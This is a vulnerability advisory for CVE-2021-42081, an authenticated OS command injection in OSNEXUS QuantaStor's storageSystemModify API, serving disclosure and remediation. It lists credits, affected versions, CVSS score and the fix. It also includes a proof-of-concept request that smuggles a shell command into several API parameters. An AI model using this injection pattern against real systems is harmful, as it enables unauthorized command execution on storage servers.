CVE-2021-42081

Authenticated Remote Command Execution vulnerability in OSNEXUS QuantaStor before 6.0.0.355

CVE

CVE-2021-42081

Title

Authenticated Remote Command Execution vulnerability in OSNEXUS QuantaStor before 6.0.0.355

Credits

Wietse Boonstra (DIVD) (finder)
Frank Breedijk (DIVD) (analyst)
Victor Pasman (DIVD) (analyst)
Victor Gevers (DIVD) (analyst)
Max van der Horst (DIVD) (analyst)
Célistine Oosting (DIVD) (analyst)

Affected products

Product	Affected	Unaffected	Unknown
OSNEXUS QuantaStor	>= 0 to < 6.0.0.355 (semver)
OSNEXUS QuantaStor			everything else

CVSS

Base score: 9.1 (CRITICAL)

References

https://www.wbsec.nl/osnexus ( third-party-advisory, technical-description, exploit )
https://csirt.divd.nl/DIVD-2021-00020/ ( third-party-advisory )
https://www.osnexus.com/products/software-defined-storage ( product )
https://csirt.divd.nl/CVE-2021-42081 ( third-party-advisory, technical-description, exploit )

Problem type(s)

CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Date published

Last modified

11 Mar 2025 13:39 UTC

Description

An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.

POC

http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al

Solution(s)

Upgrade to the latest version of OSNEXUS QuantaStor.

JSON version.

DIVD CSIRT

CVE-2021-42081

Authenticated Remote Command Execution vulnerability in OSNEXUS QuantaStor before 6.0.0.355

Description

Solution(s)